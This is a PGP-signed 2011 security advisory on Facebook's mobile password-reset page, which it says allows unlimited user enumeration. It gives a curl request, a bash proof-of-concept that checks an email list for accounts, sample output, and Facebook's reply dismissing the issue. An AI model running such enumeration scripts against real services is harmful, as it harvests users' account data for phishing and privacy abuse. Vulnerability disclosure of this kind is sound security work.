Facebook Mobile User Enumeration

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Facebook doesn't ensures the user information may  
not be collected by any bot or any automated process. Even though you  
can protect from this kind of attacks using captchas or tokens security  
into the forms.  
  
Step by step:  
  
- - Go to http://m.facebook.com  
  
- - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)  
  
- - Try using a real email address and try to use a fake email address,  
you will see two differents behavior.  
  
Well, now try to do a POST request to  
http://m.facebook.com/reset.php?refid=0 passing a email address through  
"ep" variable.  
  
Using cURL:  
  
curl -s -d "[email protected]" http://m.facebook.com/reset.php?refid=0  
  
  
This process has no validation for external or forgery site/form.  
  
  
Using the script:  
  
#--------------------  
#!/bin/bash  
for mail in $(cat $1);  
do  
s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep  
form>/dev/null);  
if [ $? -eq 0 ]; then  
echo "$mail No tiene cuenta.";  
else  
echo "$mail Si tiene cuenta.";  
fi  
done  
  
#+----- EOF ------+  
  
  
You can ennumerate users by using a list of email address or phone numbers.  
  
$ sh poc.sh mails.txt  
[email protected] NO  
[email protected] YES  
[email protected] YES  
[email protected] YES  
[email protected] NO  
[email protected] NO  
[email protected] NO  
  
  
  
  
Into the full version of facebook http://www.facebook.com this option is  
protected by a captcha to verify that we are human, in the mobile,  
version this validation doesn't exists. Facebooks says:  
  
[copy&paste]  
"Hi,  
  
While this style of information disclosure vulnerability may be  
applicable at a financial or banking website, it is a core part of  
the experience on social networks that are designed to connect email  
addresses to users. As another example, someone who desires to obtain  
this type of information could first load all of the email addresses  
into a throw-away email address book, and then utilize our contact  
importer tool. Requiring the registration of an account would not  
provide any significant additional friction.  
  
Alex Security Facebook"  
  
  
Details in  
http://www.securitybydefault.com/2011/08/busqueda-automatizada-de-cuentas.html  
  
Cheers,  
- --   
Zerial  
Seguridad Informatica  
GNU/Linux User #382319  
Blog: http://blog.zerial.org  
Jabber: [email protected]  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.11 (GNU/Linux)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iEYEARECAAYFAk44HXUACgkQIP17Kywx9JTfzwCgmpOtiEirsLQhWBON05rbVNtH  
XskAnAzjwC8gMJgajSUyEW7J7rxfjCZL  
=hGpN  
-----END PGP SIGNATURE-----  
  
`